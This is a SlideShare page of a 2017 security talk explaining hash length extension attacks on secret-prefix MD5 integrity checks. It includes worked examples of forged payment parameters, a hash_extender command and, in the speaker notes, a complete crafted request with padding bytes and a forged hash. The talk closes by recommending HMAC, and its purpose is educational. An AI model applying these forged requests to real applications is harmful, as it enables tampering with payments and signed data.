SlideShare a Scribd company logo
Hash Length Extension Attacks
Jerome Smith
CamSec April 2017
Introduction
• An application uses this scheme as an integrity check:
hash($secret + $message)
// where + denotes concatenation
• Whenever the message is potentially subject to interference, the hash is sent
alongside
• The theory goes that any message tampering will be detected
• But this is potentially vulnerable to a “hash length extension attack”
• Secret prefix
• Attacker knows message and hash
• Vulnerable algorithm, e.g. MD5, SHA-1, SHA-256, SHA-512 (not SHA-384)
• Thanks to Soroush Dalili @irsdl
What makes a hash vulnerable?
• The hash algorithm chews on the input
• At the end, the internal state of the hash algorithm is the hash it spits out
• We can set the internal state of the hash algorithm to start from this point
• We can then feed in more input
• We now have a hash for a longer message that starts with the original input
• It doesn’t matter if the input began with a secret, we don’t need to know it
Exploitation
• Sounds great, doesn’t it?
POST /transfer HTTP/1.1
account_from=10203040&account_to=90807060&amount=100&hash=AABBCC112233
// where hash = MD5("SECERET1020304090807060100")
• So we set our MD5 state to AABBCC112233, feed in a 0 and get a new hash
• This will “validate”:
account_from=10203040&account_to=90807060&amount=1000&hash=DDEEFF445566
// where hash = MD5("SECERET10203040908070601000")
• Unfortunately it’s not that simple
Deep dive
• MD5 is a block-based algorithm
• Padding is used to prepare the input before it’s digested
• Different algorithms use different schemes
• Take a message M
• The input that MD5 works on is:
M + PADDING + LENGTH_OF_M
• This will be some whole number of blocks in length
• What does that mean for our attack?
What’s really going on
account_from=10203040&account_to=90807060&amount=1000&hash=DDEEFF445566
• We’d like hash = MD5("SECERET10203040908070601000")
• When we run our hash length extension attack, the input to the hash is really:
"SECERET1020304090807060100" + PADDING + LENGTH + "0" + PADDING + LENGTH
• The “message” we have a valid hash for is:
"SECERET1020304090807060100" + PADDING + LENGTH + "0"
• The app is checking hash($secret + $account_from + $account_to + $amount)
• We need to preserve account_from=10203040&account_to=90807060
• So that leaves amount="100" + PADDING + LENGTH + "0"
• The first PADDING + LENGTH was originally “metadata”: it’s now part of the data
• The crafted input isn’t tolerated in context
Demo
• That’s not to say it can never work
seller_id=1234&reference=widget&amount=145.20&hash=75b145717ad82cfefdcd74
0683e182f0
// where hash = MD5($secret + $seller_id + $reference + $amount)
= MD5($secret + "1234widget145.20")
= MD5($secret + "1234widget145.20" + PADDING + LENGTH)
• So what about
seller_id=1234&reference=widget145.20PADDINGLENGTH&amount=0.99&hash=398e6
d69a7fdf27744bd55cfdfc9fdb4
= MD5($secret + "1234widget145.20" + PADDING + LENGTH + "0.99")
• This will work if the app accepts the weird reference value
• https://github.com/iagox86/hash_extender
./hash_extender --data 1234widget145.20 --secret-min 8 --secret-max 12 --
append 0.99 --signature 75b145717ad82cfefdcd740683e182f0 --format md5
Final Thoughts
• Not always exploitable – but when it is, impact can be high
• Tricky to find in a pure black box test
• If the hash scheme used a delimiter, the attack would still work
• Just makes it harder to find – need to know delimiter as well
• But it would stop a simpler attack:
seller_id=1234&reference=widget&amount=145.20&hash=75b145717ad82cfefdcd
740683e182f0
seller_id=1234&reference=widget1&amount=45.20&hash=75b145717ad82cfefdcd
740683e182f0
• Secret suffix is vulnerable due to collisions
• https://rdist.root.org/2009/10/29/stop-using-unsafe-keyed-hashes-use-hmac/
• We’ve already solved the MAC problem
• “Length Extension Attacks” Burp App – not tested
9
Questions?

More Related Content

What's hot

Brute force attack
Brute force attackBrute force attack
Brute force attack
joycruiser
 
The MD5 hashing algorithm
The MD5 hashing algorithmThe MD5 hashing algorithm
The MD5 hashing algorithm
Bob Landstrom
 
Introduction to Rust language programming
Introduction to Rust language programmingIntroduction to Rust language programming
Introduction to Rust language programming
Rodolfo Finochietti
 
Http Protocol
Http ProtocolHttp Protocol
Http Protocol
N R Z Malik
 
Cours partie1 elgarrai zineb
Cours partie1 elgarrai zinebCours partie1 elgarrai zineb
Cours partie1 elgarrai zineb
Zineb ELGARRAI
 
Ipsec
IpsecIpsec
Message digest 5
Message digest 5Message digest 5
Message digest 5
Tirthika Bandi
 
Web Cache Deception Attack
Web Cache Deception AttackWeb Cache Deception Attack
Web Cache Deception Attack
Omer Gil
 
Hash function
Hash function Hash function
Hash function
Salman Memon
 
Quelques points sur les métaheuristiques
Quelques points sur les métaheuristiquesQuelques points sur les métaheuristiques
Quelques points sur les métaheuristiques
BENSMAINE Abderrahmane
 
Transport Layer Security (TLS)
Transport Layer Security (TLS)Transport Layer Security (TLS)
Transport Layer Security (TLS)
Arun Shukla
 
User Authentication: Passwords and Beyond
User Authentication: Passwords and BeyondUser Authentication: Passwords and Beyond
User Authentication: Passwords and Beyond
Jim Fenton
 
SHA- Secure hashing algorithm
SHA- Secure hashing algorithmSHA- Secure hashing algorithm
SHA- Secure hashing algorithm
Ruchi Maurya
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versions
neexemil
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa Workshop
Paul Ionescu
 
Network security cryptographic hash function
Network security  cryptographic hash functionNetwork security  cryptographic hash function
Network security cryptographic hash function
Mijanur Rahman Milon
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
Marco Balduzzi
 
Cryptography
CryptographyCryptography
Cryptography
Rutuja Solkar
 
CSRF Basics
CSRF BasicsCSRF Basics
3.2 javascript regex
3.2 javascript regex3.2 javascript regex
3.2 javascript regex
Jalpesh Vasa
 

What's hot (20)

Brute force attack
Brute force attackBrute force attack
Brute force attack
 
The MD5 hashing algorithm
The MD5 hashing algorithmThe MD5 hashing algorithm
The MD5 hashing algorithm
 
Introduction to Rust language programming
Introduction to Rust language programmingIntroduction to Rust language programming
Introduction to Rust language programming
 
Http Protocol
Http ProtocolHttp Protocol
Http Protocol
 
Cours partie1 elgarrai zineb
Cours partie1 elgarrai zinebCours partie1 elgarrai zineb
Cours partie1 elgarrai zineb
 
Ipsec
IpsecIpsec
Ipsec
 
Message digest 5
Message digest 5Message digest 5
Message digest 5
 
Web Cache Deception Attack
Web Cache Deception AttackWeb Cache Deception Attack
Web Cache Deception Attack
 
Hash function
Hash function Hash function
Hash function
 
Quelques points sur les métaheuristiques
Quelques points sur les métaheuristiquesQuelques points sur les métaheuristiques
Quelques points sur les métaheuristiques
 
Transport Layer Security (TLS)
Transport Layer Security (TLS)Transport Layer Security (TLS)
Transport Layer Security (TLS)
 
User Authentication: Passwords and Beyond
User Authentication: Passwords and BeyondUser Authentication: Passwords and Beyond
User Authentication: Passwords and Beyond
 
SHA- Secure hashing algorithm
SHA- Secure hashing algorithmSHA- Secure hashing algorithm
SHA- Secure hashing algorithm
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versions
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa Workshop
 
Network security cryptographic hash function
Network security  cryptographic hash functionNetwork security  cryptographic hash function
Network security cryptographic hash function
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
 
Cryptography
CryptographyCryptography
Cryptography
 
CSRF Basics
CSRF BasicsCSRF Basics
CSRF Basics
 
3.2 javascript regex
3.2 javascript regex3.2 javascript regex
3.2 javascript regex
 

Similar to Hash length extension attacks

Hash Function.pdf
Hash Function.pdfHash Function.pdf
Hash Function.pdf
Santosh Gupta
 
Hashing vs Encryption vs Encoding
Hashing vs Encryption vs EncodingHashing vs Encryption vs Encoding
Hashing vs Encryption vs Encoding
CheapSSLsecurity
 
Hashing
HashingHashing
Network Security: Standards and Cryptography
Network Security: Standards and CryptographyNetwork Security: Standards and Cryptography
Network Security: Standards and Cryptography
Jack Davis
 
Password Storage Sucks!
Password Storage Sucks!Password Storage Sucks!
Password Storage Sucks!
nerdybeardo
 
Hashing
HashingHashing
Kieon secure passwords theory and practice 2011
Kieon secure passwords theory and practice 2011Kieon secure passwords theory and practice 2011
Kieon secure passwords theory and practice 2011
Kieon
 
TM112 Meeting12-Cryptography.pptx
TM112 Meeting12-Cryptography.pptxTM112 Meeting12-Cryptography.pptx
TM112 Meeting12-Cryptography.pptx
MohammedYusuf609377
 
Ch_07 (1).pptx
Ch_07 (1).pptxCh_07 (1).pptx
Ch_07 (1).pptx
siddhusid10
 
Hashing
HashingHashing
Applied cryptanalysis - everything else
Applied cryptanalysis - everything elseApplied cryptanalysis - everything else
Applied cryptanalysis - everything else
Vlad Garbuz
 
How does cryptography work? by Jeroen Ooms
How does cryptography work?  by Jeroen OomsHow does cryptography work?  by Jeroen Ooms
How does cryptography work? by Jeroen Ooms
Ajay Ohri
 
Message auth. code Based on Hash Functions.pptx
Message auth. code Based on Hash Functions.pptxMessage auth. code Based on Hash Functions.pptx
Message auth. code Based on Hash Functions.pptx
aribariaz507
 
Recover A RSA Private key from a TLS session with perfect forward secrecy
Recover A RSA Private key from a TLS session with perfect forward secrecyRecover A RSA Private key from a TLS session with perfect forward secrecy
Recover A RSA Private key from a TLS session with perfect forward secrecy
Priyanka Aash
 
Hash algorithms in IT security
Hash algorithms in IT securityHash algorithms in IT security
Hash algorithms in IT security
University of South Wales
 
The easiest consistent hashing
The easiest consistent hashingThe easiest consistent hashing
The easiest consistent hashing
DaeMyung Kang
 
Secure Hashing Techniques - Introduction
Secure Hashing Techniques - IntroductionSecure Hashing Techniques - Introduction
Secure Hashing Techniques - Introduction
Udhayyagethan Mano
 
UVic Startup Slam September 2014 (Kiind)
UVic Startup Slam September 2014 (Kiind)UVic Startup Slam September 2014 (Kiind)
UVic Startup Slam September 2014 (Kiind)
sendwithus
 
Breaking out of crypto authentication
Breaking out of crypto authenticationBreaking out of crypto authentication
Breaking out of crypto authentication
Mohammed Adam
 
What is HSTS.pdf
What is HSTS.pdfWhat is HSTS.pdf
What is HSTS.pdf
Host It Smart
 

Similar to Hash length extension attacks (20)

Hash Function.pdf
Hash Function.pdfHash Function.pdf
Hash Function.pdf
 
Hashing vs Encryption vs Encoding
Hashing vs Encryption vs EncodingHashing vs Encryption vs Encoding
Hashing vs Encryption vs Encoding
 
Hashing
HashingHashing
Hashing
 
Network Security: Standards and Cryptography
Network Security: Standards and CryptographyNetwork Security: Standards and Cryptography
Network Security: Standards and Cryptography
 
Password Storage Sucks!
Password Storage Sucks!Password Storage Sucks!
Password Storage Sucks!
 
Hashing
HashingHashing
Hashing
 
Kieon secure passwords theory and practice 2011
Kieon secure passwords theory and practice 2011Kieon secure passwords theory and practice 2011
Kieon secure passwords theory and practice 2011
 
TM112 Meeting12-Cryptography.pptx
TM112 Meeting12-Cryptography.pptxTM112 Meeting12-Cryptography.pptx
TM112 Meeting12-Cryptography.pptx
 
Ch_07 (1).pptx
Ch_07 (1).pptxCh_07 (1).pptx
Ch_07 (1).pptx
 
Hashing
HashingHashing
Hashing
 
Applied cryptanalysis - everything else
Applied cryptanalysis - everything elseApplied cryptanalysis - everything else
Applied cryptanalysis - everything else
 
How does cryptography work? by Jeroen Ooms
How does cryptography work?  by Jeroen OomsHow does cryptography work?  by Jeroen Ooms
How does cryptography work? by Jeroen Ooms
 
Message auth. code Based on Hash Functions.pptx
Message auth. code Based on Hash Functions.pptxMessage auth. code Based on Hash Functions.pptx
Message auth. code Based on Hash Functions.pptx
 
Recover A RSA Private key from a TLS session with perfect forward secrecy
Recover A RSA Private key from a TLS session with perfect forward secrecyRecover A RSA Private key from a TLS session with perfect forward secrecy
Recover A RSA Private key from a TLS session with perfect forward secrecy
 
Hash algorithms in IT security
Hash algorithms in IT securityHash algorithms in IT security
Hash algorithms in IT security
 
The easiest consistent hashing
The easiest consistent hashingThe easiest consistent hashing
The easiest consistent hashing
 
Secure Hashing Techniques - Introduction
Secure Hashing Techniques - IntroductionSecure Hashing Techniques - Introduction
Secure Hashing Techniques - Introduction
 
UVic Startup Slam September 2014 (Kiind)
UVic Startup Slam September 2014 (Kiind)UVic Startup Slam September 2014 (Kiind)
UVic Startup Slam September 2014 (Kiind)
 
Breaking out of crypto authentication
Breaking out of crypto authenticationBreaking out of crypto authentication
Breaking out of crypto authentication
 
What is HSTS.pdf
What is HSTS.pdfWhat is HSTS.pdf
What is HSTS.pdf
 

Recently uploaded

OpenID AuthZEN Interop Read Out - Authorization
OpenID AuthZEN Interop Read Out - AuthorizationOpenID AuthZEN Interop Read Out - Authorization
OpenID AuthZEN Interop Read Out - Authorization
David Brossard
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
Zilliz
 
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
saastr
 
20240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 202420240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 2024
Matthew Sinclair
 
Recommendation System using RAG Architecture
Recommendation System using RAG ArchitectureRecommendation System using RAG Architecture
Recommendation System using RAG Architecture
fredae14
 
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with SlackLet's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
shyamraj55
 
WeTestAthens: Postman's AI & Automation Techniques
WeTestAthens: Postman's AI & Automation TechniquesWeTestAthens: Postman's AI & Automation Techniques
WeTestAthens: Postman's AI & Automation Techniques
Postman
 
UI5 Controls simplified - UI5con2024 presentation
UI5 Controls simplified - UI5con2024 presentationUI5 Controls simplified - UI5con2024 presentation
UI5 Controls simplified - UI5con2024 presentation
Wouter Lemaire
 
20240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 202420240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 2024
Matthew Sinclair
 
Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)
Jakub Marek
 
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
名前 です男
 
Skybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoptionSkybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoption
Tatiana Kojar
 
Webinar: Designing a schema for a Data Warehouse
Webinar: Designing a schema for a Data WarehouseWebinar: Designing a schema for a Data Warehouse
Webinar: Designing a schema for a Data Warehouse
Federico Razzoli
 
Digital Marketing Trends in 2024 | Guide for Staying Ahead
Digital Marketing Trends in 2024 | Guide for Staying AheadDigital Marketing Trends in 2024 | Guide for Staying Ahead
Digital Marketing Trends in 2024 | Guide for Staying Ahead
Wask
 
Salesforce Integration for Bonterra Impact Management (fka Social Solutions A...
Salesforce Integration for Bonterra Impact Management (fka Social Solutions A...Salesforce Integration for Bonterra Impact Management (fka Social Solutions A...
Salesforce Integration for Bonterra Impact Management (fka Social Solutions A...
Jeffrey Haguewood
 
Nordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptxNordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptx
MichaelKnudsen27
 
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
Edge AI and Vision Alliance
 
Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
Pixlogix Infotech
 
Fueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte WebinarFueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte Webinar
Zilliz
 
Serial Arm Control in Real Time Presentation
Serial Arm Control in Real Time PresentationSerial Arm Control in Real Time Presentation
Serial Arm Control in Real Time Presentation
tolgahangng
 

Recently uploaded (20)

OpenID AuthZEN Interop Read Out - Authorization
OpenID AuthZEN Interop Read Out - AuthorizationOpenID AuthZEN Interop Read Out - Authorization
OpenID AuthZEN Interop Read Out - Authorization
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
 
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
 
20240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 202420240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 2024
 
Recommendation System using RAG Architecture
Recommendation System using RAG ArchitectureRecommendation System using RAG Architecture
Recommendation System using RAG Architecture
 
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with SlackLet's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
 
WeTestAthens: Postman's AI & Automation Techniques
WeTestAthens: Postman's AI & Automation TechniquesWeTestAthens: Postman's AI & Automation Techniques
WeTestAthens: Postman's AI & Automation Techniques
 
UI5 Controls simplified - UI5con2024 presentation
UI5 Controls simplified - UI5con2024 presentationUI5 Controls simplified - UI5con2024 presentation
UI5 Controls simplified - UI5con2024 presentation
 
20240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 202420240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 2024
 
Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)
 
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
 
Skybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoptionSkybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoption
 
Webinar: Designing a schema for a Data Warehouse
Webinar: Designing a schema for a Data WarehouseWebinar: Designing a schema for a Data Warehouse
Webinar: Designing a schema for a Data Warehouse
 
Digital Marketing Trends in 2024 | Guide for Staying Ahead
Digital Marketing Trends in 2024 | Guide for Staying AheadDigital Marketing Trends in 2024 | Guide for Staying Ahead
Digital Marketing Trends in 2024 | Guide for Staying Ahead
 
Salesforce Integration for Bonterra Impact Management (fka Social Solutions A...
Salesforce Integration for Bonterra Impact Management (fka Social Solutions A...Salesforce Integration for Bonterra Impact Management (fka Social Solutions A...
Salesforce Integration for Bonterra Impact Management (fka Social Solutions A...
 
Nordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptxNordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptx
 
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
 
Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
 
Fueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte WebinarFueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte Webinar
 
Serial Arm Control in Real Time Presentation
Serial Arm Control in Real Time PresentationSerial Arm Control in Real Time Presentation
Serial Arm Control in Real Time Presentation
 

Hash length extension attacks

  • 1. Hash Length Extension Attacks Jerome Smith CamSec April 2017
  • 2. Introduction • An application uses this scheme as an integrity check: hash($secret + $message) // where + denotes concatenation • Whenever the message is potentially subject to interference, the hash is sent alongside • The theory goes that any message tampering will be detected • But this is potentially vulnerable to a “hash length extension attack” • Secret prefix • Attacker knows message and hash • Vulnerable algorithm, e.g. MD5, SHA-1, SHA-256, SHA-512 (not SHA-384) • Thanks to Soroush Dalili @irsdl
  • 3. What makes a hash vulnerable? • The hash algorithm chews on the input • At the end, the internal state of the hash algorithm is the hash it spits out • We can set the internal state of the hash algorithm to start from this point • We can then feed in more input • We now have a hash for a longer message that starts with the original input • It doesn’t matter if the input began with a secret, we don’t need to know it
  • 4. Exploitation • Sounds great, doesn’t it? POST /transfer HTTP/1.1 account_from=10203040&account_to=90807060&amount=100&hash=AABBCC112233 // where hash = MD5("SECERET1020304090807060100") • So we set our MD5 state to AABBCC112233, feed in a 0 and get a new hash • This will “validate”: account_from=10203040&account_to=90807060&amount=1000&hash=DDEEFF445566 // where hash = MD5("SECERET10203040908070601000") • Unfortunately it’s not that simple
  • 5. Deep dive • MD5 is a block-based algorithm • Padding is used to prepare the input before it’s digested • Different algorithms use different schemes • Take a message M • The input that MD5 works on is: M + PADDING + LENGTH_OF_M • This will be some whole number of blocks in length • What does that mean for our attack?
  • 6. What’s really going on account_from=10203040&account_to=90807060&amount=1000&hash=DDEEFF445566 • We’d like hash = MD5("SECERET10203040908070601000") • When we run our hash length extension attack, the input to the hash is really: "SECERET1020304090807060100" + PADDING + LENGTH + "0" + PADDING + LENGTH • The “message” we have a valid hash for is: "SECERET1020304090807060100" + PADDING + LENGTH + "0" • The app is checking hash($secret + $account_from + $account_to + $amount) • We need to preserve account_from=10203040&account_to=90807060 • So that leaves amount="100" + PADDING + LENGTH + "0" • The first PADDING + LENGTH was originally “metadata”: it’s now part of the data • The crafted input isn’t tolerated in context
  • 7. Demo • That’s not to say it can never work seller_id=1234&reference=widget&amount=145.20&hash=75b145717ad82cfefdcd74 0683e182f0 // where hash = MD5($secret + $seller_id + $reference + $amount) = MD5($secret + "1234widget145.20") = MD5($secret + "1234widget145.20" + PADDING + LENGTH) • So what about seller_id=1234&reference=widget145.20PADDINGLENGTH&amount=0.99&hash=398e6 d69a7fdf27744bd55cfdfc9fdb4 = MD5($secret + "1234widget145.20" + PADDING + LENGTH + "0.99") • This will work if the app accepts the weird reference value • https://github.com/iagox86/hash_extender ./hash_extender --data 1234widget145.20 --secret-min 8 --secret-max 12 -- append 0.99 --signature 75b145717ad82cfefdcd740683e182f0 --format md5
  • 8. Final Thoughts • Not always exploitable – but when it is, impact can be high • Tricky to find in a pure black box test • If the hash scheme used a delimiter, the attack would still work • Just makes it harder to find – need to know delimiter as well • But it would stop a simpler attack: seller_id=1234&reference=widget&amount=145.20&hash=75b145717ad82cfefdcd 740683e182f0 seller_id=1234&reference=widget1&amount=45.20&hash=75b145717ad82cfefdcd 740683e182f0 • Secret suffix is vulnerable due to collisions • https://rdist.root.org/2009/10/29/stop-using-unsafe-keyed-hashes-use-hmac/ • We’ve already solved the MAC problem • “Length Extension Attacks” Burp App – not tested

Editor's Notes

  1. For MD5: PADDING is 0x80 plus null bytes LENGTH is bits in a little-endian 8 byte-field
  2. PADDING and LENGTH not necessarily printable bytes and make no sense in context of app
  3. Output of hash_extender is ASCII hex of $data + PADDING + LENGTH + $append PADDING starts 0x800000… LENGTH is length($secret + $data) in bits (“SUPERSECRET1234widget145.20” = 27 bytes = 216 bits = 0xD8) Need “data” parameter so it knows how much PADDING and LENGTH to tack on (technically could just be a number but output includes that data) Output differs with length of secret as longer secret -> shorter padding and shorter length, but “new signature” i.e. new hash same as we’re winding on the hash from the same start point (the given hash) with the same data appended
  4. Delimiter stops parameter manipulation when concatenation used Doesn’t stop hash length extension if delimiter known… ---------------------------------------- /hash/pay-delim.php seller_id=1234&reference=widget&amount=145.20&hash=f9243d9e5b806d8bb3e5746024f6c124 App is calculating: MD5($secret + ":1234:widget:145.20") Of course actually it’s calculating: MD5($secret + ":1234:widget:145.20" + PADDING + LENGTH) ./hash_extender --data :1234:widget:145.20 --secret-min 8 --secret-max 12 --append :0.99 --signature f9243d9e5b806d8bb3e5746024f6c124 --format md5 seller_id=1234&reference=widget:145.20%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%f0%00%00%00%00%00%00%00&amount=0.99&hash=05c695020d4e3bba16071d6c8b514b3a App calculates MD5($secret + ":1234:widget:145.20" + PADDING + LENGTH + ":0.99")